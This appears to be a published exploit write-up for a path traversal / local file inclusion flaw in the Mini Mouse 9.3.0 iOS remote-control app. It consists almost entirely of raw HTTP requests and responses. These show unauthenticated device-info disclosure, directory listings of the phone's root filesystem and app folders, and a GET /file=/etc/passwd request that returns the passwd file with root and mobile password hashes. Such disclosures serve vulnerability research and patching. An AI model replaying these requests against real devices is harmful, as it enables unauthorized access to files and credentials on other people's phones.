# Exploit Title: Mini Mouse 9.3.0 - Local File inclusion / Path Traversal # Author: gosh # Date: 05-04-2021 # Vendor Homepage: http://yodinfo.com # Software Link: https://apps.apple.com/us/app/mini-mouse-remote-control/id914250948 # Version: 9.3.0 # Tested on: iPhone; iOS 14.4.2 GET /op=get_device_info HTTP/1.1 Host: 192.168.1.104:8039 Accept: */* Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 Connection: keep-alive Accept-Encoding: gzip, deflate User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) Content-Length: 0 HTTP/1.1 200 OK Server: bruce_wy/1.0.0 Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS Access-Control-Allow-Headers: Content-Type,Origin,Accept Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true P3P: CP=CAO PSA OUR Content-Type: application/json Content-Range: bytes 0-0/-1 { "ret_code": 1, "ret_msg": "success", "data": { "uuid": "7E07125B-61BE-4F12-820C-FA706C445219", "model": "iPhone", "sys_name": "iOS", "sys_version": "14.4.2", "battery_state": 0, "battery_level": -1, "memery_total_size": 2983772160, "device_name": "mobile", "user_name": "iPhone", "pwd": "", "dir_user": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download", "dir_doc": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents", "dir_desktop": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Desktop", "sys_type": 3 } } ------------------------------------------------------------------------------------- POST /op=get_file_list HTTP/1.1 Host: 192.168.1.104:8039 Accept: */* Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 Connection: keep-alive Accept-Encoding: gzip, deflate User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) Content-Length: 0 HTTP/1.1 200 OK Server: bruce_wy/1.0.0 Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS Access-Control-Allow-Headers: Content-Type,Origin,Accept Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true P3P: CP=CAO PSA OUR Content-Type: application/json Content-Range: bytes 0-0/-1 { "ret_code": 1, "ret_msg": "success", "data": { "list": [{ "path": "//usr", "is_local": true, "is_hide": false, "is_floder": true, "name": "usr", "name_display": "usr", "file_size": 288, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//bin", "is_local": true, "is_hide": false, "is_floder": true, "name": "bin", "name_display": "bin", "file_size": 128, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//sbin", "is_local": true, "is_hide": false, "is_floder": true, "name": "sbin", "name_display": "sbin", "file_size": 544, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//.file", "is_local": true, "is_hide": true, "is_floder": false, "name": ".file", "name_display": ".file", "file_size": 0, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//etc", "is_local": true, "is_hide": false, "is_floder": true, "name": "etc", "name_display": "etc", "file_size": 11, "create_time": 1577865.600000, "update_time": 1577865.600000, "sys_type": 3 }, { "path": "//System", "is_local": true, "is_hide": false, "is_floder": true, "name": "System", "name_display": "System", "file_size": 128, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//var", "is_local": true, "is_hide": false, "is_floder": true, "name": "var", "name_display": "var", "file_size": 11, "create_time": 1577865.600000, "update_time": 1577865.600000, "sys_type": 3 }, { "path": "//Library", "is_local": true, "is_hide": false, "is_floder": true, "name": "Library", "name_display": "Library", "file_size": 672, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//private", "is_local": true, "is_hide": false, "is_floder": true, "name": "private", "name_display": "private", "file_size": 224, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//dev", "is_local": true, "is_hide": false, "is_floder": true, "name": "dev", "name_display": "dev", "file_size": 1395, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//.ba", "is_local": true, "is_hide": true, "is_floder": true, "name": ".ba", "name_display": ".ba", "file_size": 64, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//.mb", "is_local": true, "is_hide": true, "is_floder": true, "name": ".mb", "name_display": ".mb", "file_size": 64, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//tmp", "is_local": true, "is_hide": false, "is_floder": true, "name": "tmp", "name_display": "tmp", "file_size": 15, "create_time": 1577865.600000, "update_time": 1577865.600000, "sys_type": 3 }, { "path": "//Applications", "is_local": true, "is_hide": false, "is_floder": true, "name": "Applications", "name_display": "Applications", "file_size": 3296, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//Developer", "is_local": true, "is_hide": false, "is_floder": true, "name": "Developer", "name_display": "Developer", "file_size": 64, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//cores", "is_local": true, "is_hide": false, "is_floder": true, "name": "cores", "name_display": "cores", "file_size": 64, "create_time": 0, "update_time": 0, "sys_type": 3 }] } } ------------------------- using the data found: /var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download POST /op=get_file_list HTTP/1.1 Host: 192.168.1.104:8039 Accept: */* Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 Connection: keep-alive Accept-Encoding: gzip, deflate User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) Content-Length: 101 {"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/"} HTTP/1.1 200 OK Server: bruce_wy/1.0.0 Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS Access-Control-Allow-Headers: Content-Type,Origin,Accept Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true P3P: CP=CAO PSA OUR Content-Type: application/json Content-Range: bytes 0-0/-1 { "ret_code": 1, "ret_msg": "success", "data": { "list": [{ "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//GDT", "is_local": true, "is_hide": false, "is_floder": true, "name": "GDT", "name_display": "GDT", "file_size": 96, "create_time": 1617228.400302, "update_time": 1617228.400302, "sys_type": 3 }, { "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//input_photo.jpg", "is_local": true, "is_hide": false, "is_floder": false, "name": "input_photo.jpg", "name_display": "input_photo.jpg", "file_size": 6141491, "create_time": 1617583.738397, "update_time": 1617583.738402, "sys_type": 3 }, { "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Ico", "is_local": true, "is_hide": false, "is_floder": true, "name": "Ico", "name_display": "Ico", "file_size": 64, "create_time": 1617583.334913, "update_time": 1617583.334913, "sys_type": 3 }, { "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Download", "is_local": true, "is_hide": false, "is_floder": true, "name": "Download", "name_display": "Download", "file_size": 64, "create_time": 1617228.371587, "update_time": 1617228.371587, "sys_type": 3 }] } } ---------------------------------------------------------------------- GET /file=/etc/passwd HTTP/1.1 Host: 192.168.1.104:8039 Accept: */* Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 Connection: keep-alive Accept-Encoding: gzip, deflate User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) Content-Length: 4 {} HTTP/1.1 200 OK Server: bruce_wy/1.0.0 Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS Access-Control-Allow-Headers: Content-Type,Origin,Accept Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true P3P: CP=CAO PSA OUR Content-Type: application/octet-stream Content-Range: bytes 0-0/2018 Content-Length : 2018 ## # User Database # # This file is the authoritative user database. ## nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false _ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false _networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false _wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false _installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false _neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false _ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false _securityd:*:64:64:securityd:/var/empty:/usr/bin/false _mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false _sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false _unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false _distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false _astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false _ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false _findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false _datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false _captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false _analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false _timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false _gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false _reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false _diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false _logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false _iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false _fud:*:278:278:Firmware Update Daemon:/var/db/fud:/usr/bin/false _knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false _coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false